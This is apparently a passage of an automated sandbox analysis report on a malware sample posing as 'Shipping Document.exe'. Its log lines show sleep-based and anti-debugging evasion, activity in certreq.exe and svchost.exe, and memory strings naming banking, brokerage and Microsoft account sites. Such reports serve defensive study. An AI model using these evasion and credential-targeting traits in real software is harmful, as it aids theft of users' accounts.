Source: C:\Windows\SysWOW64\certreq.exe TID: 5696	Thread sleep count: 8913 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe TID: 5696	Thread sleep time: -17826000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580	Thread sleep time: -45000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\certreq.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\certreq.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01024696 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_01024696
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0102C93C FindFirstFileW,FindClose,	1_2_0102C93C
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0102C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_0102C9C7
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0102F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0102F35D
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0102F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0102F200
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0102F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0102F65E
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01023A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_01023A2B
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01023D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_01023D4E
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_0102BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0102BF27
Source: C:\Windows\SysWOW64\certreq.exe	Code function: 4_2_02F3B8A0 FindFirstFileW,FindNextFileW,FindClose,	4_2_02F3B8A0

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_00FC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_00FC4AFE

Source: 33sf7m69.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 33sf7m69.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 33sf7m69.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 33sf7m69.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 33sf7m69.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 33sf7m69.4.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 33sf7m69.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 33sf7m69.4.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 33sf7m69.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 33sf7m69.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 33sf7m69.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 33sf7m69.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 33sf7m69.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 33sf7m69.4.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 33sf7m69.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 33sf7m69.4.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3982811551.0000000001320000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.1971556229.0000017A9688D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 33sf7m69.4.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: 33sf7m69.4.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 33sf7m69.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 33sf7m69.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 33sf7m69.4.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 33sf7m69.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 33sf7m69.4.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 33sf7m69.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 33sf7m69.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 33sf7m69.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 33sf7m69.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 33sf7m69.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 33sf7m69.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 33sf7m69.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 33sf7m69.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\Shipping Document.exe	API call chain: ExitProcess graph end node			graph_1-98234
Source: C:\Users\user\Desktop\Shipping Document.exe	API call chain: ExitProcess graph end node			graph_1-98300

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0307096E rdtsc

2_2_0307096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417153 LdrLoadDll,

2_2_00417153

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_010341FD BlockInput,

1_2_010341FD

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_00FC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00FC3B4C

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_00FF5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_00FF5CCC

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_0103C304 LoadLibraryA,GetProcAddress,

1_2_0103C304

Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01E53570 mov eax, dword ptr fs:[00000030h]	1_2_01E53570
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01E53510 mov eax, dword ptr fs:[00000030h]	1_2_01E53510
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_01E51ED0 mov eax, dword ptr fs:[00000030h]	1_2_01E51ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]	2_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]	2_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]	2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h]	2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]	2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]	2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]	2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]	2_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310634F mov eax, dword ptr fs:[00000030h]	2_2_0310634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]	2_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]	2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]	2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]	2_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]	2_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]	2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]	2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]	2_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]	2_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]	2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]	2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310625D mov eax, dword ptr fs:[00000030h]	2_2_0310625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]	2_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]	2_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]	2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]	2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]	2_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]	2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]	2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]	2_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]	2_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h]	2_2_031062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]	2_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]	2_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]	2_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]	2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]	2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]	2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]	2_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]	2_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]	2_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]	2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]	2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]	2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]	2_2_030D4180
